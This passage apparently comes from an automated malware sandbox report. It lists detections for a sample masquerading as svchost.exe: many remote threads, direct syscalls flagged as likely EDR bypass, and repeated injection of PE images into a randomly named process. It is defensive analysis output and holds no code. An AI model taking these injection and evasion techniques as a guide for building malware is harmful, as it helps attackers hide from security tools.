    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 29C1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 3121360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2B41360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2681360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 2301360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 14B1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 621360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: D31360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 10F1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1621360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: A71360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: B81360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: F51360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: FD1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 8C1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 12E1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: DD1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 11D1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: BB1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 7E1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: C31360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 1471360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: DF1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: E11360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 11C1360Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeThread created: unknown EIP: 651360Jump to behavior
    Found direct / indirect Syscall (likely to bypass EDR)
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtUnmapViewOfSection: Direct from: 0x77462D3C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtCreateMutant: Direct from: 0x774635CC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtMapViewOfSection: Direct from: 0x77462D1C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtResumeThread: Direct from: 0x774636AC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtProtectVirtualMemory: Direct from: 0x77462F9C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtSetInformationProcess: Direct from: 0x77462C5C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtSetInformationThread: Direct from: 0x774563F9
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtNotifyChangeKey: Direct from: 0x77463C2C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtSetTimerEx: Direct from: 0x77457B2E
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtAllocateVirtualMemory: Direct from: 0x77462BFC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtQueryInformationProcess: Direct from: 0x77462C26
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtQuerySystemInformation: Direct from: 0x77462DFC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtAllocateVirtualMemory: Direct from: 0x77463C9C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtClose: Direct from: 0x77462B6C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtQuerySystemInformation: Direct from: 0x774648CC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtSetInformationThread: Direct from: 0x77462B4C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtQueryAttributesFile: Direct from: 0x77462E6C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtDeviceIoControlFile: Direct from: 0x77462AEC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtOpenSection: Direct from: 0x77462E0C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtCreateFile: Direct from: 0x77462FEC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtOpenFile: Direct from: 0x77462DCC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtSetInformationThread: Direct from: 0x77462ECC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtQueryInformationToken: Direct from: 0x77462CAC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtQuerySystemInformation: Direct from: 0x1C
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtTerminateThread: Direct from: 0x77462FCC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtAdjustPrivilegesToken: Direct from: 0x77462EAC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtQueryValueKey: Direct from: 0x77462BEC
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeNtOpenKeyEx: Direct from: 0x77462B9C
    Injects a PE file into a foreign processes
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 872000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 822000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 27C2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D72000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E12000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2172000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1222000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9D2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A42000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29B2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2742000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: CB2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2892000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1112000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2212000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EA2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2862000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9F2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B52000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 13B2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2232000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2982000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2322000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2992000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2872000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2582000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2802000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C02000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2D32000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 822000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 31B2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2872000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2CF2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2AC2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2602000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2922000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E92000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2272000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1472000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2272000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2702000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E82000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 24E2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DB2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2882000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28D2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EF2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1572000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2312000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B62000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2382000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2FC2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2792000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 3122000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B42000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2682000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2302000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 622000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D32000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 10F2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1622000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A72000 value starts with: 4D5AJump to behavior
